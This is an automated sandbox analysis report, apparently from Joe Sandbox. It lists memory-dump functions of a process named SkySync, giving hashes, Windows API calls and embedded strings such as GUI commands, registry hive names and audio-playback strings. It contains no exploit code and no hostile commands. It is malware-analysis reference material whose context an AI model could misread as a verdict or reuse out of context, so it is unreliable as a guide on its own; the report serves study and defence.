Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 2e0a51759760cc063db8c83d2a598b30c6206e3f117f5374aa535b4368e3bca4
Instruction ID: caee43816d2604f81addb6d4057a6a86be027c1c30853f7f52ddc9326d90a607
Opcode Fuzzy Hash: 2e0a51759760cc063db8c83d2a598b30c6206e3f117f5374aa535b4368e3bca4
Instruction Fuzzy Hash: 8E519E30900709AFDB21EFA9CE8AB6EBBF5FF44714F100918E546A35A1CB74A915CB50

Function 00B149CF Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00B14A61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B14AAC

Strings

UNCHECK, xrefs: 00B14C88
CHECK, xrefs: 00B14ACC
GETTOTALCOUNT, xrefs: 00B14A93
GETTEXT, xrefs: 00B14BFF
COLLAPSE, xrefs: 00B14AF2
GETITEMCOUNT, xrefs: 00B14B8E
ISCHECKED, xrefs: 00B14C2F
EXISTS, xrefs: 00B14B15
EXPAND, xrefs: 00B14B5E
GETSELECTED, xrefs: 00B14BBC
SELECT, xrefs: 00B14C5D

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 547b7192b70b7bc871877a7a75ac1c7772f28a91b4f561b3129a37b6ee4b82e2
Instruction ID: c8fe6ee571f9ec6a62c8b4e9febaa4965cbd07a9dde9e60999eca5d59f8cec3e
Opcode Fuzzy Hash: 547b7192b70b7bc871877a7a75ac1c7772f28a91b4f561b3129a37b6ee4b82e2
Instruction Fuzzy Hash: E3916D342047119FCB04EF20C691AAAB7E5EF94354F508898F8965B3A2DF31ED4ADB81

Function 00B1A7DE Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,?), ref: 00B1A8F8
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00B1A972
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00B1A994
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B1A9A7
DestroyWindow.USER32(00000000), ref: 00B1A9C9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00A90000,00000000), ref: 00B1AA00
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B1AA19
GetDesktopWindow.USER32 ref: 00B1AA32
GetWindowRect.USER32(00000000), ref: 00B1AA39
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B1AA51
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00B1AA69

Part of subcall function 00A929AB: GetWindowLongW.USER32(?,000000EB), ref: 00A929BC

Strings

tooltips_class32, xrefs: 00B1A96B, 00B1A9F9
0, xrefs: 00B1A894

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect
String ID: 0$tooltips_class32
API String ID: 1652260434-3619404913
Opcode ID: f8ca5d7bf7bf315f58abcef469f579ed0560f533c42d06a52ae1bf5642eb5a48
Instruction ID: 7b8e3ed8f01bb32deb00253aff117fd399a4b71a97717b18eabe4865cf719a42
Opcode Fuzzy Hash: f8ca5d7bf7bf315f58abcef469f579ed0560f533c42d06a52ae1bf5642eb5a48
Instruction Fuzzy Hash: 4471AA75290200AFD721DF68CC48FAB7BE5EB88310F44059DF986872A1DB31F986CB52

Function 00B1BE70 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00B1BF26
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00B197E7), ref: 00B1BF82
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B1BFBB
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00B1BFFE
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B1C035
FreeLibrary.KERNEL32(?), ref: 00B1C041
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B1C051
DestroyIcon.USER32(?,?,?,?,?,00B197E7), ref: 00B1C060
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00B1C07D
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00B1C089

Strings

.icl, xrefs: 00B1BE9C
.exe, xrefs: 00B1BEBC
.dll, xrefs: 00B1BEDF

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 1446636887-1154884017
Opcode ID: d75d3a3bff160ddc3f44dcc85faae358b7372c561e2904a9b3a54fea7464e72d
Instruction ID: b26a0b40eb8f8a9bf7e70bc6045c3d9a3aa77ac4981616d03f9e2c53d3fac168
Opcode Fuzzy Hash: d75d3a3bff160ddc3f44dcc85faae358b7372c561e2904a9b3a54fea7464e72d
Instruction Fuzzy Hash: 4361CD71A40218FAEB24AF64DC85FFA7BA8EB08710F104249F915D60D1DB74AA81DBA0

Function 00B1CCA6 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00A929E2: GetWindowLongW.USER32(?,000000EB), ref: 00A929F3

DragQueryPoint.SHELL32(?,?), ref: 00B1CCCF

Part of subcall function 00B1B1A9: ClientToScreen.USER32(?,?), ref: 00B1B1D2
Part of subcall function 00B1B1A9: GetWindowRect.USER32(?,?), ref: 00B1B248
Part of subcall function 00B1B1A9: PtInRect.USER32(?,?,00B1C6BC), ref: 00B1B258

SendMessageW.USER32(?,000000B0,?,?), ref: 00B1CD38
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00B1CD43
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00B1CD66
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00B1CDAD
SendMessageW.USER32(?,000000B0,?,?), ref: 00B1CDC6
SendMessageW.USER32(?,000000B1,?,?), ref: 00B1CDDD
SendMessageW.USER32(?,000000B1,?,?), ref: 00B1CDFF
DragFinish.SHELL32(?), ref: 00B1CE06
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00B1CEF9

Strings

@GUI_DROPID, xrefs: 00B1CE26
@GUI_DRAGID, xrefs: 00B1CE71
@GUI_DRAGFILE, xrefs: 00B1CEA8

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 221274066-3440237614
Opcode ID: 59663f26c1583c8296b2a31f39a285b485dcb381f9fea85a16a63b4e7a1be4a8
Instruction ID: 4c6fa90551fdee7b42ffe9e7ac76a34284f9e6d10c49749cc6e594b4ceb6f5b3
Opcode Fuzzy Hash: 59663f26c1583c8296b2a31f39a285b485dcb381f9fea85a16a63b4e7a1be4a8
Instruction Fuzzy Hash: E8614872108301AFC711EF60DD85E9BBBF8EF89750F400A6DF595932A1DB70AA49CB52

Function 00AFA995 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00AFAA0E
GetDriveTypeW.KERNEL32 ref: 00AFAA5B
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AFAAA3
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AFAADA
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AFAB08

Strings

wait, xrefs: 00AFAAC5
set cd door , xrefs: 00AFAAA9
type cdaudio alias cd wait, xrefs: 00AFAA86
closed, xrefs: 00AFAA22, 00AFAA2B
close, xrefs: 00AFAA14
open, xrefs: 00AFAA35
close cd wait, xrefs: 00AFAAF3
open , xrefs: 00AFAA6A

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1600147383-4113822522
Opcode ID: 57f3ef06cbc9cd1f985e058a18d5383a2238a931c20df709b3ecb21df2939a10
Instruction ID: d0e79679e583516555602a2948f841f18c60e4f9d6a758d854e8e47161874ab6
Opcode Fuzzy Hash: 57f3ef06cbc9cd1f985e058a18d5383a2238a931c20df709b3ecb21df2939a10
Instruction Fuzzy Hash: C9514CB5204305AFC700EF50C981D6AB3E4FF99758F10495DF99A572A1DB31EE06CB92

Function 00B1C0A5 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00B1982C,?,?), ref: 00B1C0C8
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00B1982C,?,?,00000000,?), ref: 00B1C0DF
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00B1982C,?,?,00000000,?), ref: 00B1C0EA
CloseHandle.KERNEL32(00000000,?,?,?,?,00B1982C,?,?,00000000,?), ref: 00B1C0F7
GlobalLock.KERNEL32(00000000), ref: 00B1C100
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00B1982C,?,?,00000000,?), ref: 00B1C10F
GlobalUnlock.KERNEL32(00000000), ref: 00B1C118
CloseHandle.KERNEL32(00000000,?,?,?,?,00B1982C,?,?,00000000,?), ref: 00B1C11F
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00B1982C,?,?,00000000,?), ref: 00B1C130
OleLoadPicture.OLEAUT32(?,00000000,00000000,00B23C7C,?), ref: 00B1C149
GlobalFree.KERNEL32(00000000), ref: 00B1C159
GetObjectW.GDI32(00000000,00000018,?), ref: 00B1C17D
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00B1C1A8
DeleteObject.GDI32(00000000), ref: 00B1C1D0
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00B1C1E6

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: e278862a899d64b0c9ee6ade4528b69e49026395ac1836477b7e83fdd6abab62
Instruction ID: 4296ee9733e4190f8da079554b9c4704997fbeb1a3d50ae133b7123c3ab0019f
Opcode Fuzzy Hash: e278862a899d64b0c9ee6ade4528b69e49026395ac1836477b7e83fdd6abab62
Instruction Fuzzy Hash: 1A414971680208FFDB21AF65DC8CEAE7BB9EF89711F104059F905E7261DB319942DB60

Function 00AF82D5 Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 378timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00AF831A
VariantCopy.OLEAUT32(00000000,?), ref: 00AF8323
VariantClear.OLEAUT32(00000000), ref: 00AF832F
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00AF841D
VarR8FromDec.OLEAUT32(?,?), ref: 00AF8479
VariantInit.OLEAUT32(?), ref: 00AF852A
SysFreeString.OLEAUT32(?), ref: 00AF85BE
VariantClear.OLEAUT32(?), ref: 00AF8618
VariantClear.OLEAUT32(?), ref: 00AF8627
VariantInit.OLEAUT32(00000000), ref: 00AF8665

Strings

Default, xrefs: 00AF84DA
%4d%02d%02d%02d%02d%02d, xrefs: 00AF8447

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: f585d144ef404b6a77cea735d67e333021fb4084610967e48b02f72c45666574
Instruction ID: 202c67a1d203cad5f695f94f2fea16524be6cbc070abdd71097ce9b2024a31c1
Opcode Fuzzy Hash: f585d144ef404b6a77cea735d67e333021fb4084610967e48b02f72c45666574
Instruction Fuzzy Hash: 0ED1AC31604519EBDF20AFE5C884B7EB7B4BF05B00F248655F605AB2A1DF38E944DBA1

Function 00B07A04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00B07A79
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00B07A85
CreateCompatibleDC.GDI32(?), ref: 00B07A91
SelectObject.GDI32(00000000,?), ref: 00B07A9E
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00B07AF2
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00B07B2E
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00B07B52
SelectObject.GDI32(00000006,?), ref: 00B07B5A
DeleteObject.GDI32(?), ref: 00B07B63
DeleteDC.GDI32(00000006), ref: 00B07B6A
ReleaseDC.USER32(00000000,?), ref: 00B07B75

Strings

(, xrefs: 00B07AFA

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 8f0b9702dee4267fdf33a7f111c19bca23ebfb6fb9765593c094f667eacd7d60
Instruction ID: 99a155d1056f5c484ef966b201771be753dac8157edd48e95c05181b25962d3d
Opcode Fuzzy Hash: 8f0b9702dee4267fdf33a7f111c19bca23ebfb6fb9765593c094f667eacd7d60
Instruction Fuzzy Hash: 35515C71A44209EFDB25DFA8CC84EAFBBF9EF48310F14845DF949A7251DB31A9418B60

Function 00AE8ACA Relevance: 19.7, APIs: 13, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AE8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AE8E3C
Part of subcall function 00AE8E20: GetLastError.KERNEL32(?,00AE8900,?,?,?), ref: 00AE8E46
Part of subcall function 00AE8E20: GetProcessHeap.KERNEL32(00000008,?,?,00AE8900,?,?,?), ref: 00AE8E55
Part of subcall function 00AE8E20: HeapAlloc.KERNEL32(00000000,?,00AE8900,?,?,?), ref: 00AE8E5C
Part of subcall function 00AE8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AE8E73

Part of subcall function 00AE8EBD: GetProcessHeap.KERNEL32(00000008,00AE8916,00000000,00000000,?,00AE8916,?), ref: 00AE8EC9
Part of subcall function 00AE8EBD: HeapAlloc.KERNEL32(00000000,?,00AE8916,?), ref: 00AE8ED0
Part of subcall function 00AE8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00AE8916,?), ref: 00AE8EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AE8B2E
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AE8B62
GetLengthSid.ADVAPI32(?), ref: 00AE8B73
GetAce.ADVAPI32(?,00000000,?), ref: 00AE8BB0
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AE8BCC
GetLengthSid.ADVAPI32(?), ref: 00AE8BE9
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00AE8BF8
HeapAlloc.KERNEL32(00000000), ref: 00AE8BFF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AE8C20
CopySid.ADVAPI32(00000000), ref: 00AE8C27
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AE8C58
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AE8C7E
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AE8C92

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 1795222879-0
Opcode ID: 2079b54f0b15ad855c056b20a4a5375064edb4696f630ce72bce7e7e614cfee3
Instruction ID: 23c1904ff4f992e815022315d33a6ce376c3ed7e426e3562a8789bafee9bb858
Opcode Fuzzy Hash: 2079b54f0b15ad855c056b20a4a5375064edb4696f630ce72bce7e7e614cfee3
Instruction Fuzzy Hash: E1617871900249AFDF10DFA2DD85EEEBB79FF45300F148169F919A7291DB399A01CB60

Function 00B1C854 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A929E2: GetWindowLongW.USER32(?,000000EB), ref: 00A929F3

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B1C8A4
GetFocus.USER32 ref: 00B1C8B4
GetDlgCtrlID.USER32(00000000), ref: 00B1C8BF
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00B1CA15
GetMenuItemCount.USER32(?), ref: 00B1CA35
GetMenuItemID.USER32(?,00000000), ref: 00B1CA48
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00B1CA7C
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00B1CAC4
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B1CAFC
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00B1CB31

Strings

0, xrefs: 00B1C9E2

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: e39df3dc4b3d1f9ed83605019e69409daa756c3585a65597366829439ea82698
Instruction ID: 417fe894f8823d46d2a7d298941f91c73f9375a875d175c4afd6cfb83f085a98
Opcode Fuzzy Hash: e39df3dc4b3d1f9ed83605019e69409daa756c3585a65597366829439ea82698
Instruction Fuzzy Hash: F4819E702483059FDB21DF14D985AABBBE8FF88350F40499DF98593291CB30DD85CBA2

Function 00B1147A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B1040D,?,?), ref: 00B11491

Strings

HKEY_CURRENT_USER, xrefs: 00B11570
HKU, xrefs: 00B115A3
HKCC, xrefs: 00B1155F
HKEY_USERS, xrefs: 00B11592
HKEY_CLASSES_ROOT, xrefs: 00B11524
HKLM, xrefs: 00B1150F
HKEY_CURRENT_CONFIG, xrefs: 00B1154E
HKEY_LOCAL_MACHINE, xrefs: 00B114FA
HKCR, xrefs: 00B11539
HKCU, xrefs: 00B11581

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 5fbcaaf9e93ad5de36ccf7c6c8da653ff446aef1b2734bf41e733847f713cea5
Instruction ID: eacb9d632399f6b7addb7734ab66e09480223fdad7836240941d7aa18faa7d44
Opcode Fuzzy Hash: 5fbcaaf9e93ad5de36ccf7c6c8da653ff446aef1b2734bf41e733847f713cea5
Instruction Fuzzy Hash: A8416F3150125ADFDF00EF98D941AEA37A9FF61300F9048A5FE5257292DB30EE59DB60

Function 00AF5882 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00AF58EB
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00AF5901
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AF5912
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00AF5924
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00AF5935

Strings

status PlayMe mode, xrefs: 00AF58E6
close PlayMe, xrefs: 00AF58FC, 00AF5929
play PlayMe, xrefs: 00AF5930
play PlayMe wait, xrefs: 00AF591F
alias PlayMe, xrefs: 00AF58C4
open , xrefs: 00AF589A

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: SendString
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 890592661-1007645807
Opcode ID: b8ef4b18dbc8b440e1c379760774e40fb78d0a0749ed87a1065bb9b56d911840
